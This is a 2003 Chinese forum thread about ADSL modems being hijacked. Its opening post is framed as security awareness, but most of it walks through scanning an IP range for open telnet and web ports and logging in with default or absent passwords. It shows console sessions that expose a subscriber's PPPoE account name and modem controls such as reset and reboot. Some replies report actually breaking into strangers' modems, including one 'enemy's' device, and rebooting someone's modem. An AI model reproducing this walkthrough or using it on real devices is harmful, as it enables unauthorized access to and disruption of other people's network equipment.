搜索 社区服务 统计排行 帮助
  • 1793阅读
  • 20回复

ADSL猫被黑过程及防范

楼层直达
级别: 新手上路
注册时间:
2003-08-27
在线时间:
0小时
发帖:
14
今天看到有的网友ADSL被黑,为了提高大家的安全意识,消除被黑的恐惧,找来一些资料,让大家知道一下自己是怎么被黑以及一些防黑的方法.
现在用ADSL的人越来越多了,电信局也大力推荐一些带路由的ADSL MODEM,大家都知道,这些ADSL MODEM大多数用Telnet设置,例如中兴ZXDSL,ZyXEL PRESTIGE 642 ADSL Modem。
但是被黑的原因大都是因为用户的安全意识不高造成的。

密码
一般ADSL Modem需要一个密码登陆设置界面,但这个默认密码经常被公开,而电信局也没有提示用户更改,这样的MODEM给用户留下了一个隐患

破坏
ADSL Modem的设置里经常有些敏感选项,如reset、disconnect、reboot等,一旦这些设置改动,你的Modem也许就“废”了

实例
用任意一个扫描器扫自己所处IP段的80,23端口,一会儿就会看到一些IP有回应.
开放80端口的ADSL可以直接用WEB页面控制,打开控制页面前会被要求输入网络密码,不过用户名和密码根据ADSL Modem的品牌和型号不同,可以到它们各自的网站或者google去查到它们的默认用户名和密码,如果ADSL Modem的使用者没有更改它们的话,那么这整个MODEM的控制权就会交给不法入侵者了

开放23端口的,现在Telnet上去:
c:\windows\>telnet x.x.x.x 23
Router Manager Console Version: 1.07
Please enter your password:
要密码?上google找一下相关资料,Login~~
Please enter your password: ****
User Logged in.

Router Setup>

c:\windows\>telnet x.x.x.x 23

*******************
Welcome to Titanium
*******************

GlobespanVirata Inc., Software Release VIK-1.37.020524i/T93.3.13.
Copyright (c) 2001-2002 by GlobespanVirata, Inc.

login:
又要?再google……
上面两个都是要默认密码的,不好玩,看看下面的拍案惊奇:
c:\windows\>telnet x.x.x.x 23

ISIN 6131R Copyright by ARESCOM 2001

Login Success!
没有搞错?我没输入Password啊~~~@_@
ISIN>help
先看看帮助

******* Console Help Menu *******
Available Command:

add add objects in talbe
connect start the connection
delete delete objects in table
disconnect disconnect modem connection
help display this menu again
quit quit the system
reboot reboot the router
reset reset the configuration, and reboot
save save the configuration
set set system parameters
show display system status
test system test
upgrade upgrade the firmware via FTP, TFTP and XMODEM

ISIN>show sysinfo

Vendor: Arescom
Model: ISIN 6131R (Hardware)
Version: 5.3.08B (Software version)
UpTime: 0363:57 (hh:mm)

ISIN>

再看:
c:\windows\>telnet x.x.x.x 23

logged on; type `@exit' to close connection.
>>help
陌生人记得问路:P
Command:
adsl - entry to ADSL menu
default - set all configuration to factory setting
ipoa - entry to IPoA menu
lan - entry to Ethernet menu
list - list status for enabled PVC
manage - entry to management menu
mode - exit this menu and change modem mode
pat - entry to PAT menu
ping - ping IP for testing purpose
pppoa - entry to PPPoA menu
pppoe - entry to PPPoE menu
quick - quick setup
r1483 - entry to RFC1483 menu
restart - reboot modem
rtable - entry to Routing Table menu
save - save and restart modem
show - display configuration of PVC and Ethernet
ver - display software version

Type 'help' or 'help ' for more details
>> show
看看他有什么秘密?
Ethernet ip: 192.168.1.1
Subnet mask: 255.255.255.0
FullDuplex:Enable

DHCP current setting : disable.
DHCP ineffective setting : disable.

PPPoE setting:
Function VPI/VCI CLASS UserID/Authentication
PPPoE 0/35 ubr bnn*******/CHAP <-------账号
LLC=Disable Echo is disabled

PPPoE IP : 218.21.*.*

PAT enabled interface:
Interface IP address
PPPoE 218.21.*.*


PAT incoming table:
No. i/f name|WanIP Port/Protocal Server IP
1 pppoe 23/tcp 192.168.1.1

effective routing table:
route add ppp_route 0.0.0.0 218.21.*.* 00:00:00:00 1 # MAN via ppp_
device

>> ver

Version : 2.80ZE (2.80ZE-H01.2103-FM11.0507A10Z 24/Jul/2001 14:50)


仅仅这样就掌握了整个MODEM的控制权!只要我修改他的配置,他的MODEM就麻烦了,等电信局的人上门维修吧!

预防
安装防火墙,禁止外部连接,更改ADSL Modem默认密码。

op8888cn
级别: 新手上路
注册时间:
2003-05-13
在线时间:
0小时
发帖:
58
只看该作者 20楼 发表于: 2003-10-26
呵呵,谢谢了~ 看了你的贴子我就找到了几个人的ADSL MODOM.有一个人的上网帐号居然是偶一个仇人的MODOM.哈哈谢谢楼主了~~
级别: 圣骑士
注册时间:
2003-04-14
在线时间:
1小时
发帖:
2075
只看该作者 19楼 发表于: 2003-10-26
密码改好了,多谢提醒



级别: 版主
注册时间:
2003-05-27
在线时间:
17小时
发帖:
4709
只看该作者 18楼 发表于: 2003-10-26
对我来说没用 我们这里用的是enus

地狱乃我们必赴之处
级别: 新手上路
注册时间:
2003-04-23
在线时间:
0小时
发帖:
102
只看该作者 17楼 发表于: 2003-10-26
刚刚去试了一下
让不知道谁的modem重起了
汗……
改密码了
感谢~

はやし[eDtoon]
级别: 风云使者
注册时间:
2002-06-02
在线时间:
2小时
发帖:
4248
只看该作者 16楼 发表于: 2003-10-26
d-link猫就只对内网ip开放,而且好像不能改变,只能是192.168.0.1才可以

T
换签名……
----------------------------------------------------------------------------------------------
1,美丽的2008
【 动画合集 】怨念终结-战斗妖精雪风FANSUB作品全集
http://popgo.net/bbs/showthread.php?s=&threadid=491263
----------------------------------------------------------------------------------------------
2,美丽的2009
你知道十一长假里除了咱伟大祖国60周年生日和中秋节还有什么喜讯?那就是PSS漫游梦工坊又开始做犬夜叉完结篇了
http://popgo.net/bbs/showthread.php?s=&threadid=521259
----------------------------------------------------------------------------------------------
3,泡坛子多年的感想
每次看到“沙发”二字,就让我想起了一个飞盘和后面飞奔追随的一群狗。
级别: 风云使者
注册时间:
2001-11-21
在线时间:
2小时
发帖:
6978
只看该作者 15楼 发表于: 2003-10-26
引用
最初由 jacobliu 发布
ADSL modem為什麼會開啟遠端的控制權?
真是奇怪的設定,照理來說應該要限定內網的ip才有權限...


就因为这样所以才说这是硬件上的BUG,顺便问问这样的猫如何改变对外的默认http端口,我只知道怎么改密码的,改端口就不知道了

风清云淡
级别: 侠客
注册时间:
2002-04-16
在线时间:
0小时
发帖:
376
只看该作者 14楼 发表于: 2003-10-26
ADSL modem為什麼會開啟遠端的控制權?
真是奇怪的設定,照理來說應該要限定內網的ip才有權限...
级别: 元老
注册时间:
2002-12-06
在线时间:
4小时
发帖:
57
只看该作者 13楼 发表于: 2003-10-25
呵呵,好像确实是这样,这类文章看过比较多了

不过个人认为就算误导也不用锁啊?
级别: 新手上路
注册时间:
2003-06-10
在线时间:
0小时
发帖:
176
只看该作者 12楼 发表于: 2003-10-25
经楼主提醒要好好去研究下~~~
级别: 新手上路
注册时间:
2003-08-27
在线时间:
0小时
发帖:
14
只看该作者 11楼 发表于: 2003-10-25
我们的斑竹太客气了,啊有这么严重,解了我的锁就是了!
一起874垃圾的ADSL modem厂商!呵呵

op8888cn
级别: 管理员
注册时间:
2002-12-19
在线时间:
244小时
发帖:
16411
只看该作者 10楼 发表于: 2003-10-25
在这里真诚向op8888cn会员道歉,请原谅。
/me 严重874垃圾的ADSL modem厂商,真白痴!

-=eDtoon=-aru
----------------------------------------------------------------------------------------------
有空来看看我的
个人blog

崇尚猪的生活 ~
多吃多睡少说话~
级别: 管理员
注册时间:
2002-12-19
在线时间:
244小时
发帖:
16411
只看该作者 9楼 发表于: 2003-10-24
端口只是绑定到内部IP,外网无法访问的,这篇文章严重误导,锁了...

不要意思,是我错了,这些modem真的有这个漏洞,请小心防范!!!改密码和端口最好,至于防火墙只是防你的pc,无法防到这类入侵的。

-=eDtoon=-aru
----------------------------------------------------------------------------------------------
有空来看看我的
个人blog

崇尚猪的生活 ~
多吃多睡少说话~
级别: 工作组
注册时间:
2002-11-28
在线时间:
0小时
发帖:
1485
只看该作者 8楼 发表于: 2003-10-24
adsl这么恐怖阿?
pzf
级别: 侠客
注册时间:
2003-04-20
在线时间:
0小时
发帖:
383
只看该作者 7楼 发表于: 2003-10-24
不开telnet或者 把23端口换成别的就行了

[[CHN][edtoon][TLF]eric]
快速回复

限150 字节
上一个 下一个